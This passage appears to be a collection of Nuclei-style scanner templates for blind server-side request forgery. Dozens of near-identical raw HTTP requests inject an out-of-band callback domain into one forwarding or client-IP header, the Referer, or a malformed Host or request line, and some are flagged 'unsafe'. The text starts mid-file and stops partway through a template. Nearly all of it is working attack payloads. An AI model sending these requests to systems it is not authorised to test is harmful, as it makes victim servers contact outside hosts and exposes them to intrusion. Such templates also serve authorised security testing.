        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-32.yaml:
--------------------------------------------------------------------------------
id: 0x032

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cdn-Src-Ip: {{Host}}.{{Port}}.BSSRF-032.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-33.yaml:
--------------------------------------------------------------------------------
id: 0x033

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cdn-Real-Ip: {{Host}}.{{Port}}.BSSRF-033.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-34.yaml:
--------------------------------------------------------------------------------
id: 0x034

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        CF-Connecting-IP: {{Host}}.{{Port}}.BSSRF-034.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-35.yaml:
--------------------------------------------------------------------------------
id: 0x035

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Host: {{Host}}.{{Port}}.BSSRF-035.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-36.yaml:
--------------------------------------------------------------------------------
id: 0x036

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Custom-IP-Authorization: {{Host}}.{{Port}}.BSSRF-036.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-37.yaml:
--------------------------------------------------------------------------------
id: 0x037

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{Scheme}}://{{Host}}.{{Port}}.BSSRF-037.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-38.yaml:
--------------------------------------------------------------------------------
id: 0x038

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-038.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-39.yaml:
--------------------------------------------------------------------------------
id: 0x039

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | X-Forwarded-Host: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-039.{{MY-DOMAIN}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-4.yaml: -------------------------------------------------------------------------------- 1 | id: 0x004 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - |+ 11 | GET / HTTP/1.1 12 | Host: {{Hostname}}:@{{Host}}.{{Port}}.BSSRF-004.{{MY-DOMAIN}} 13 | Cache-Control: no-transform 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Accept-Encoding: gzip, deflate 16 | Accept: */* 17 | 18 | unsafe: true 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-40.yaml: -------------------------------------------------------------------------------- 1 | id: 0x040 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | X-Forwarded: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-040.{{MY-DOMAIN}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-41.yaml: -------------------------------------------------------------------------------- 1 | id: 0x041 2 | 3 | info: 4 | name: Blind SSRF 5 | 
author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | Forwarded-For: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-041.{{MY-DOMAIN}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-42.yaml: -------------------------------------------------------------------------------- 1 | id: 0x042 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | Forwarded: for={{Hostname}}@{{Host}}.{{Port}}.BSSRF-042.{{MY-DOMAIN}};by={{Hostname}}@{{Host}}.{{Port}}.BSSRF-042.{{MY-DOMAIN}};host={{Hostname}}@{{Host}}.{{Port}}.BSSRF-042.{{MY-DOMAIN}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" -------------------------------------------------------------------------------- /Templates/BlindSSRF-43.yaml: -------------------------------------------------------------------------------- 1 | id: 0x43 2 | 3 | info: 4 | name: Blind SSRF 5 | author: 0xAwali 6 | severity: info 7 | 8 | requests: 9 | - raw: 10 | - | 11 | GET / HTTP/1.1 12 | Host: {{Hostname}} 13 | X-Remote-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-043.{{MY-DOMAIN}} 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 15 | Cache-Control: no-transform 16 | Accept-Encoding: gzip, deflate 17 | Accept: */* 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "Your Match" 
--------------------------------------------------------------------------------
/Templates/BlindSSRF-44.yaml:
--------------------------------------------------------------------------------
id: 0x044

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Remote-Addr: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-044.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-45.yaml:
--------------------------------------------------------------------------------
id: 0x045

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        True-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-045.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-46.yaml:
--------------------------------------------------------------------------------
id: 0x046

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-046.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-47.yaml:
--------------------------------------------------------------------------------
id: 0x047

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-047.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-48.yaml:
--------------------------------------------------------------------------------
id: 0x048

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Cluster-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-048.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-49.yaml:
--------------------------------------------------------------------------------
id: 0x049

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        WL-Proxy-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-049.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-5.yaml:
--------------------------------------------------------------------------------
id: 0x005

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}} @{{Host}}.{{Port}}.BSSRF-005.{{MY-DOMAIN}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-50.yaml:
--------------------------------------------------------------------------------
id: 0x050

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Proxy-Client-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-050.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-51.yaml:
--------------------------------------------------------------------------------
id: 0x051

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Fastly-Client-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-051.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-52.yaml:
--------------------------------------------------------------------------------
id: 0x052

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        True-Client-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-052.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-53.yaml:
--------------------------------------------------------------------------------
id: 0x053

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Real-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-053.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-54.yaml:
--------------------------------------------------------------------------------
id: 0x054

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Originating-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-054.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-55.yaml:
--------------------------------------------------------------------------------
id: 0x055

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Ali-CDN-Real-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-055.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-56.yaml:
--------------------------------------------------------------------------------
id: 0x056

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cdn-Src-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-056.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-57.yaml:
--------------------------------------------------------------------------------
id: 0x057

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cdn-Real-Ip: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-057.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-58.yaml:
--------------------------------------------------------------------------------
id: 0x058

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        CF-Connecting-IP: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-058.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-59.yaml:
--------------------------------------------------------------------------------
id: 0x059

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Host: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-059.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-6.yaml:
--------------------------------------------------------------------------------
id: 0x006

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET @{{Host}}.{{Port}}.BSSRF-006.{{MY-DOMAIN}}# HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-60.yaml:
--------------------------------------------------------------------------------
id: 0x060

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Custom-IP-Authorization: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-060.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-61.yaml:
--------------------------------------------------------------------------------
id: 0x061

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{Scheme}}://{{Hostname}}@{{Host}}.{{Port}}.BSSRF-061.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-62.yaml:
--------------------------------------------------------------------------------
id: 0x062

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: {{Host}}.{{Port}}.BSSRF-062.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-63.yaml:
--------------------------------------------------------------------------------
id: 0x063

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-063.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-64.yaml:
--------------------------------------------------------------------------------
id: 0x064

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded: {{Host}}.{{Port}}.BSSRF-064.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-65.yaml:
--------------------------------------------------------------------------------
id: 0x065

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Forwarded-For: {{Host}}.{{Port}}.BSSRF-065.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-66.yaml:
--------------------------------------------------------------------------------
id: 0x066

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Forwarded: for={{Host}}.{{Port}}.BSSRF-066.{{MY-DOMAIN}}/.{{Hostname}};by={{Host}}.{{Port}}.BSSRF-066.{{MY-DOMAIN}}/.{{Hostname}};host={{Host}}.{{Port}}.BSSRF-066.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-67.yaml:
--------------------------------------------------------------------------------
id: 0x067

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Remote-IP: {{Host}}.{{Port}}.BSSRF-067.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-68.yaml:
--------------------------------------------------------------------------------
id: 0x068

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Remote-Addr: {{Host}}.{{Port}}.BSSRF-068.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-69.yaml:
--------------------------------------------------------------------------------
id: 0x069

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        True-Client-IP: {{Host}}.{{Port}}.BSSRF-069.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-7.yaml:
--------------------------------------------------------------------------------
id: 0x007

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET @{{Host}}.{{Port}}.BSSRF-007.{{MY-DOMAIN}}# HTTP/1.0
        Host: {{Hostname}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-70.yaml:
--------------------------------------------------------------------------------
id: 0x070

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Client-IP: {{Host}}.{{Port}}.BSSRF-070.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-71.yaml:
--------------------------------------------------------------------------------
id: 0x071

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Client-IP: {{Host}}.{{Port}}.BSSRF-071.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-72.yaml:
--------------------------------------------------------------------------------
id: 0x072

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Cluster-Client-IP: {{Host}}.{{Port}}.BSSRF-072.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-73.yaml:
--------------------------------------------------------------------------------
id: 0x073

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        WL-Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-073.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-74.yaml:
--------------------------------------------------------------------------------
id: 0x074

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-074.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-75.yaml:
--------------------------------------------------------------------------------
id: 0x075

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Fastly-Client-Ip: {{Host}}.{{Port}}.BSSRF-075.{{MY-DOMAIN}}/.{{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
